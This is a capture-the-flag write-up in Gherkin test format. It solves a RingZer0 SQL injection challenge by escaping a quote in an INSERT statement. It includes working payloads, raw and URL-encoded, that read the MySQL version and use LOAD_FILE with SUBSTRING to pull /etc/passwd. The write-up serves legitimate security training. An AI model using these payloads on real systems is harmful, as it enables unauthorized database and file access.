## Version 2.0
## language: en

Feature: size-doesmatter-ringerzeroctf
  Site:
    https://ringzer0ctf.com/challenges/78
  Category:
    SQL Injection
  User:
    john2104
  Goal:
    Get the flag

  Background:
  Hacker's software:
  | <Software name> | <Version>           |
  | NixOS           | 19.09.2260          |
  | Chromium        | 78.0.3904.87        |

  Machine information:
    Given the challenge URL
    """
    https://ringzer0ctf.com/challenges/78
    """
    When I open the url with Chrome
    Then I see a string saying "Flag is in /etc/passwd"
    And a button to the url
    """
    http://challenges.ringzer0team.com:10078/
    """
    And there I see a login form
  Scenario: Fail:Sql-injection
    Given the form
    And knowing that answer is correct when It returns:
    """
    FLAG-*********************
    """
    When I try with a well known payload
    """
    ' or '1'='1
    username=%27+or+%271%27%3D%271&comment=%27+or+%271%27%3D%271
    """
    Then I get "or 1=1: or 1=1"
    And I don't solve the challenge

   Scenario: Success:quote-Sql-injection
    Given that I inspected the functionality
    And tried with the payload
    """
    \'
    username=%5C%27&comment=a
    """
    Then I get an error message
    """
    You have an error in your SQL syntax; check the manual that corresponds to
    your MySQL server version for the right syntax to use near 'a')' at line 1
    """
    And I figure out the query
    """
    insert into something (username,comment)
    values ('input1','input2')
    """
    When I use the following payload
    """
    \'
    ,@@version);#
    username=%5C%27&comment=%2C%40%40version%29%3B%23
    """
    Then I get "', : 5.7.21-0ubuntu0.16.04.1"
    And I can now get things from the database
    When I use the following payload to get the file "/etc/passwd"
    """
    \'
    ,LOAD_FILE("/etc/passwd"));#')
    """
    Then I get a truncated file with 120 of limit
    """
    ', : root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/
    sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys
    """
    When I use the SUBSTRING function to limit the output
    """
    \'
    SUBSTRING(LOAD_FILE("/etc/passwd"),840,120));#')
    username=%5C%27&comment=%2CSUBSTRING%28LOAD_FILE%28%22%2Fetc%2Fpasswd%22
    %29%2C840%2C120%29%29%3B%23
    """
    Then I get the flag
    And I solve the challenge
